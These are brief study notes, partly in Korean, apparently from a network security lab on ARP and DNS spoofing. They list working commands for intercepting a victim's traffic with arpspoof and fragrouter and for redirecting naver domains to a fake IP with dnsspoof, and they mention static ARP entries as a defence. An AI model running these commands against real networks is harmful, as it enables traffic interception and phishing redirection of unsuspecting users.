spoofing

arp -> ip주소를 mac주소로 변환 하는 것

rarp

----------

arp spoofing 

forwarding -> 가로챈 데이터가 원래 가야 하는 목적지로 흘러갈수 있도록함

reply 를 받으면 arp table에 기록 되고 계속 갱신됨 -> 공격이 될떄도 있고 안 될 때도 있게 되는 이유

backtrack5

sshd-generate

arpspoof -i eth0 192.168.0.victim 192.168.0.gateway     -> spoofing 

fragrouter -B1   -> 가로챈 패킷 forwarding 

정적으로 설정 -> arp spoofing 방지 

arp -s 192.168.0.gateway 00-00-00-00-mac주소 

* 네트워크 공격은 100% 된다고 장담은 못함 

DNS spoofing 

DNS cache가 남아있으면 공격이 끝나도 스푸핑 된 상태로 남아 있게 됨 -> 재부팅 ?

DNS 패킷에서 query 0x91...를 따라가면 아이피 나옴 

killall -9 arpspoof fragrouter

dnsspoof -i eth0 -f /root/host

vim /root/host

192.168.0.fake    *.naver.*